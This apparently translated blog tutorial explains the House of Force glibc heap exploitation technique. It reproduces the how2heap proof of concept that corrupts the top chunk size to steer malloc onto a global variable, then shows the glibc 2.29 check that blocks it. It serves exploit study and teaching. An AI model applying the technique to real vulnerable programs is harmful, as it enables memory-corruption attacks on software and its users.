I skipped mmap overlapping chunks; I'll write that up some day when I feel like studying the relevant source code and mechanism in detail (it probably won't come up much anyway). For now, let's start with the simpler House of Force.
Principle
Overwrite the size of the top chunk with a very large value (-1). If we know the difference between the top chunk's address and the address we want to control, a single request can place the next chunk right there.
Exploitation
Before 2.29
The experiment code is as follows (from how2heap):
```c
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <assert.h>

/* The target: a global in .bss that the heap would never legitimately hand out. */
char bss_var[] = "This is a string that we want to overwrite.";

int main(int argc, char *argv[])
{
    /* Allocate one chunk; the top chunk starts right after it. */
    intptr_t *p1 = malloc(256);
    int real_size = malloc_usable_size(p1);

    /* ptr_top points at the top chunk's prev_size field, so the next
     * 8 bytes are its size field. */
    intptr_t *ptr_top = (intptr_t *)((char *)p1 + real_size - sizeof(long));

    /* Corrupt the top chunk's size to -1 (0xffffffffffffffff). */
    *(intptr_t *)((char *)ptr_top + sizeof(long)) = -1;

    /* Request exactly enough so the remaining top chunk lands on bss_var;
     * the 4 * sizeof(long) accounts for the chunk headers involved. */
    unsigned long evil_size = (unsigned long)bss_var - sizeof(long) * 4 - (unsigned long)ptr_top;
    void *new_ptr = malloc(evil_size);
    (void)new_ptr;

    /* The next allocation is served from the relocated top chunk: bss_var. */
    void *ctr_chunk = malloc(100);
    strcpy(ctr_chunk, "YEAH!!!");

    assert(ctr_chunk == bss_var);
    return 0;
}
```
The exploitation steps are as follows:
2.29 and later
glibc 2.29 added a sanity check on the top chunk's size, so this method no longer works:
```c
/* glibc malloc/malloc.c, _int_malloc(), 2.29 and later */
use_top:
  victim = av->top;
  size = chunksize (victim);

  if (__glibc_unlikely (size > av->system_mem))
    malloc_printerr ("malloc(): corrupted top size");
```
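To make the effect of that check concrete, here is an added model of the two use_top decisions (my own code, not glibc's and not from the original post): chunksize() strips the three flag bits, then 2.29+ compares the size against av->system_mem before the check all versions share, size >= nb + MINSIZE. It assumes x86-64 glibc (SIZE_BITS = 0x7, MINSIZE = 0x20) and a constructed system_mem of 0x21000.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* Added model of the use_top decision, not glibc code. Assumes x86-64:
 * the low three bits of a size field are flags and MINSIZE is 0x20. */
#define SIZE_BITS 0x7UL   /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */
#define MINSIZE   0x20UL  /* smallest chunk glibc will carve off top */

enum top_verdict { TOP_SERVES, TOP_CORRUPTED, TOP_TOO_SMALL };

/* chunksize(): the size field with the flag bits stripped */
static size_t chunksize(size_t size_field) { return size_field & ~SIZE_BITS; }

/* Decide whether top can serve a (rounded) request of nb bytes.
 * top_size_field: raw size field of the top chunk, as stored on the heap
 * system_mem:     bytes the arena actually obtained from the kernel */
enum top_verdict use_top_check(size_t top_size_field, size_t system_mem,
                               size_t nb, bool glibc_2_29_or_later)
{
    size_t size = chunksize(top_size_field);

    /* 2.29+: a top chunk claiming more than the arena owns is rejected,
     * which is exactly what the -1 written in the experiment does. */
    if (glibc_2_29_or_later && size > system_mem)
        return TOP_CORRUPTED;       /* "malloc(): corrupted top size" */

    /* All versions: top must hold the request plus a MINSIZE remainder. */
    if (size >= nb + MINSIZE)
        return TOP_SERVES;
    return TOP_TOO_SMALL;           /* glibc would grow the heap instead */
}

int main(void)
{
    const size_t forged_top = (size_t)-1;   /* the -1 from the experiment */
    const size_t system_mem = 0x21000;      /* constructed: 132 KiB initial heap */
    const size_t nb = 0x10000;              /* constructed: a large request */

    printf("forged top, glibc < 2.29:  %d\n", use_top_check(forged_top, system_mem, nb, false));
    printf("forged top, glibc >= 2.29: %d\n", use_top_check(forged_top, system_mem, nb, true));
    printf("sane top 0x20d11, >= 2.29: %d\n", use_top_check(0x20d11, system_mem, 0x110, true));
    return 0;
}
```

The forged -1 passes the old size >= nb + MINSIZE test but fails the 2.29 system_mem comparison, which is why the experiment aborts on newer glibc.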